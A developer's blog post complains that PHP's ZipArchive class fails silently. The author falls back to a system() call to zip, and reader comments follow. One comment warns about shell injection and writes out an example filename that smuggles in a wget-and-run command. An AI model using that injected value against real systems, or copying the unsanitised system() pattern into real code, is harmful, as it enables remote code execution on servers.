This is very rare, PHP’s extensions are usually well done but this one, ZipArchive class is very annoying and I’m very surprised that it’s now in PHP’s distribution…
In my case, it doesn’t create the archive for some reason and it doesn’t throw any errors either.
http://us3.php.net/manual/en/class.ziparchive.php
I’m very disappointed and I wasted a lot of time and yes, all the permissions etc. are right.
So ended up using system calls; first create a temporary folder and then something like:
system("zip -r THE_ZIP_FILE.zip PATH_TO_THE_TMP_FOLDER");
And now the problem with this is that it’s not portable, it’s fine in my case though.
6 Comments 
Leave a comment
Back To Top
Back To Previous Page
Author Bio
Hamid Alipour is a partner in Codehead, LLP with his wife, Tess. Hamid speaks 12 markup and programming languages [Yes, 12: PHP, CSS, Ajax, JavaScript, HTML/XHTML, Java, Python, C/C++, ASP, Visual Basic, Scheme and Action Script]; has a penchant for solving the unsolvable; an affinity for clean, hand-written code and is a Zend Certified 
Services
Blog
Tools
About
Contact
Blog Home
You have to make sure the filename and temp path does not contain shell meta characters. If an attacker can control, e.g., the “THE_ZIP_FILE” part, he can set it to “zz.zip /tmp ; { wget blabla ; sh ./exploit ; > /dev/null 2>&1 }; true ” and you will not even see anything in the error log.
Comment
Everything in that command is generated by me and not by the user but that is right, whoever wants to use it must be careful…
Comment
Did you ever get to the bottom of why you couldn’t get the ZipArchive class to save?
I’m having the exact same problem, and I’m tearing my hair out because I need it to work! PHP on my server isn’t allowed to execute commands or system calls, so this seems to be the only solution.
Thanks
Comment
Sadly, I didn’t find a solution, I have a dedicated server so I can use system calls; I would bug the developer about this…
Comment
Same problem here. This is so annoying. And the ZipArchive status reports “No error”.
Comment
There are many classes for zip in http://www.phpclasses.org … even i had this same problem … and i used one which worked perfectly well and did the job … plz search at the given link … i dont remember the name exactly..
btw your blog is kool and very informative
Comment